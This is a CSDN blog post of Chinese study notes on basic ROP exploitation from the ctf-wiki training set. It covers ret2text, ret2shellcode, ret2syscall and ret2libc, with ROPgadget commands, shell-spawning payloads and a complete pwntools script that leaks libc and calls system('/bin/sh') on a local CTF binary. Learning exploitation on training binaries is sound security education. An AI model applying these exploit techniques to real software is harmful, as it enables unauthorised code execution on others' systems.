ctf-wiki 基本ROP

最新推荐文章于 2024-04-21 03:32:34 发布
最新推荐文章于 2024-04-21 03:32:34 发布
阅读量436 收藏 1
点赞数 2
分类专栏: pwn入门 文章标签: 网络 linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61823031/article/details/125733129
版权

ret2text
原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。
这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。
流程

  1. 首先我们检查了可执行文件,发现程序是32位程序,仅仅开启了栈不可执行保护。
  2. 使用IDA查看源码,可以看出程序在主函数中使用了gets函数,显然存在栈溢出漏洞。
  3. 同时在secure函数中发现了调用 system(“/bin/sh”)的代码。
  4. 调试程序计算s相对于返回地址的偏移。
  5. 编写payload。
    ret2shellcode
    原理:ret2shellcode,即控制程序执行 shellcode 代码。shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。一般来说,shellcode 需要我们自己填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的代码。
    在栈溢出的基础上,要想执行 shellcode,需要对应的 binary 在运行时,shellcode 所在的区域具有可执行权限。
    流程:
  6. 首先检查可执行文件,发现几乎没开启任何保护,并且有可读可写可执行段。
  7. 使用IDA查看源码,并且调试可以看到bss段上的buf可以进行写入shellcode。
  8. 调试计算偏移。
  9. 编写payload。
    ret2syscall
    原理:ret2syscall,即控制程序执行系统调用,获取 shell。
    流程:
  10. 首先检测程序开启的保护,开启了NX保护。
  11. 由于我们不能直接利用程序中的某一段代码或者自己填写代码来获得 shell,所以我们利用程序中的 gadgets 来获得 shell。
  12. 寻找控制命令。

系统调用号,即 eax 应该为 0xb
第一个参数,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
第二个参数,即 ecx 应该为 0
第三个参数,即 edx 应该为 0
ROPgadget --binary rop --only ‘pop|ret’ | grep ‘eax’
ROPgadget --binary rop --only ‘pop|ret’ | grep ‘ebx’
ROPgadget --binary rop --string ‘/bin/sh’
ROPgadget --binary rop --only ‘int’

  1. 编写payload。
    payload = flat([‘A’ * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
    ret2libc
    原理:ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system(“/bin/sh”),故而此时我们需要知道 system 函数的地址。
    ret2libc1
    流程:
  2. 首先检测程序开启的保护,开启了NX保护。
  3. 查找system函数和’/bin/sh’字符串。
  4. 调试计算偏移。
  5. 编写payload。
    payload = flat([‘a’ * 112, system_plt, ‘b’ * 4, binsh_addr])
    注意:这里我们需要注意函数调用栈的结构,如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以’bbbb’ 作为虚假的地址,其后参数对应的参数内容。
    ret2libc2
    流程:
  6. 首先检测程序开启的保护,开启了NX保护。
  7. 查找system函数和构造’/bin/sh’字符串。
  8. 查找一个pop函数用来返回到system的地址。
  9. 编写payload。
    payload = flat([‘a’ * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])
    试了一下貌似不使用pop也可以,疑惑。
    ret2libc3
    对应有两个表,一个用来存放外部的函数地址的数据表称为全局偏移表(GOT, Global Offset Table),那个存放额外代码的表称为程序链接表(PLT,Procedure Link Table)
    Part One : 泄露
    首先 由于PLT和GOT的延迟绑定机制 我们只可以泄露在溢出前的函数地址 那么这里 我们首先选择Puts函数,
    首先 我们先从当前ELF中获取PUTS的GOT和PLT,并且打印后查询.
    Part Two : Get_Shell
    在泄露了Libc版本后 我们就可以使用Libc中的函数之类的东西了 但是我们还是需要计算偏移
    Libc偏移 = 源地址 - libc地址
    之后 我们再把Libc加上偏移 我们就Getshell了
    在这里插入图片描述
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
elf=ELF('ret2libc3')
p=process('./ret2libc3')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
start_addr = elf.symbols['_start']
#gdb.attach(p)
payload1=b'A'*112+p32(puts_plt)+p32(start_addr)+p32(puts_got)
p.sendlineafter("!?",payload1)
puts_addr=u32(p.recv(4))
libc=LibcSearcher('puts',puts_addr)
libcbase=puts_addr-libc.dump("puts")
system_addr=libcbase+libc.dump("system")
binsh_addr=libcbase+libc.dump("str_bin_sh")
payload2=b'A'*112+p32(system_addr)+p32(1234)+p32(binsh_addr)
p.sendlineafter("!?",payload2)
p.interactive()

本地的话你可以看看他用的本地什么库
libc = ELF(本地libc地址),载入文件
pwn哥 21:56:17
然后基地址就 libcbase = putsaddr - libc.symbols[‘puts’]
systemaddr = libcbase + libc.symbols['system]

Day-3
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF笔记:ROP技术
PwnGuo的博客
05-19 665
Security Fest CTF 2016-tvstation 程序执行情况 运行程序发现菜单只有3个选项,但实际在IDA分析可见有选项4. 并且选项4中debug()函数输出system在内存中地址 查看返回值debug_func()函数,明显存在溢出点。 .text节(Section)属于第一个LOAD段(Segment),这个段的文件长度和内存长度是一样的,也就是说所有的代码都是原样映射到内存中,代码之间的相对偏移是不会改变的。由于前面的...
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1278
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
网络安全ctf比赛 学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线
最新发布
2401_82977171的博客
04-21 701
WebGoat运行在带有java虚拟机的平台之上,当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效、危险的HTML注释等等。Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。
PWN初体验之ret2text
weixin_43137410的博客
08-04 651
"Hello,World!"的浪漫可能只有直男才懂!
CTF-WIKI部署注意事项
syy的博客
09-14 371
1、python3.6版本无法部署,后来我使用的是python3.8版本。2、使用Google浏览器打开CTF-WIKI网站。CTF-WIKI网络攻防一个开源的学习平台。由于github加载过慢,所以将其部署在本地。
[PWN] CTF-WIKI ret2text
qq_46441427的博客
02-06 425
ret2text 首先我们打开题目,checksec一下,主要是查看一下该程序是多少位的,并了解其保护机制 32位的小端位程序,没有开启canary堆栈保护及NX,于是我们用32位ida打开 我们打开ida-32,看到源码,发现了一个get函数,这属于我们常说的危险函数 在函数框,我们找到了一个secure函数,调出来,发现有一个system("/bin/sh")函数 这个时候,我们只需要知道调用system函数的指令的地址,然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst
ctf-wikiCTF Wiki的新起点! 快来加入我们,我们需要您!
02-04
CTF维基 欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的不断发展, CTF挑战的难度...
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-wiki-en:流行的ctf-wiki的完整英文版
05-13
欢迎使用CTF WikiCTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的发展, CTF挑战的难度越来越大。...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
apachecn#apachecn-ctf-wiki#CTF-AWD靶场搭建和第一题题解_星星明亮的博客-CSDN博客_awd靶
07-25
1.根据当前队伍数量copy所有的队伍的比赛文件夹: 2.启动比赛: 1.每个队伍分配到一个docker主机,给定ctf用户权限,通过制定的端口和密码进行连接
ctf-wiki基本ROP2-ret2shellcode学习笔记
m0_58824086的博客
09-03 323
shellcode的长度为44,而IDA告诉我们,s的首地址 = ebp - 64h,如果再加上ebp_of_caller本身的4字节则会有s的首地址 = &return_address - 68h。而vmmap告诉我们,地址在0x804a000~0x804b000的内容是可读、可写,因此bss段和data段也是可读、可写的。但这题非常特殊,IDA提供给我们的数据是错误的(一般情况下是正确的),当IDA和gdb计算偏移值有冲突时,应当以gdb为准。r(Read,读取):对文件而言,具有读取文件内容的权限;
网络安全ctf比赛_学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!
qq_44005305的博客
11-12 133
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
ctfwiki--堆的基础操作
I have a dream
06-20 2017
参考链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/basic-zh/#__comments 堆的基础操作 unlink unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在其他地方使用。 (1)malloc 从恰好合适的 large bin 中获取 chunk...
基本ROP(三)
Pwnpanda的博客
05-08 1852
每日一结【第3天】 由于个人水平有限,所以相当一部分是引用CTF Wiki(再次安利一波) ret2syscall 原理: ret2syscall需要我们控制程序执行系统调用,获取shell。 样例:rop 前期基本的操作之前两篇已经讲了,这里就直接上图了 我们这次把程序扔到IDA里㕛有新的发现了 此次我们利用程序中的gadgets来获得shell,而对应的shel...
D^3CTF babyrop 经验总结
qq_43189757的博客
11-29 590
思路: 调试时发现在栈中有一个libc_start_main的地址 可以根据这个地址算出距one_gadget 的偏移 得到这个偏移后再让libc_start_main这个地址加上这个偏移即可得到one_gaget的地址, 之后再用这个地址覆盖ret即可getshell, 需要注意的是要满足one_gadget的约束条件, 我选则的是偏移为0x4526a 处的one_gadget, 所以需要保...
基本ROP技巧总结
极目楚天舒的博客
05-06 5616
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
rop入门(二)
李永亮的专栏
07-05 9394
一: 上一篇讲解了一下什么是rop以及如何搭建rop框架,本章节讲解,如何使用rop进行服务的调用以及参数的传递 同springMvc相似 rop也是通过在web.xml中配置拦截来声明该url链接启用rop框架。至于如何调用controller层内的方法,rop有专门的参数用来指定,这个下边会讲到。示例: web.xml <!-- rop servlet --> <servle
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1848
rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值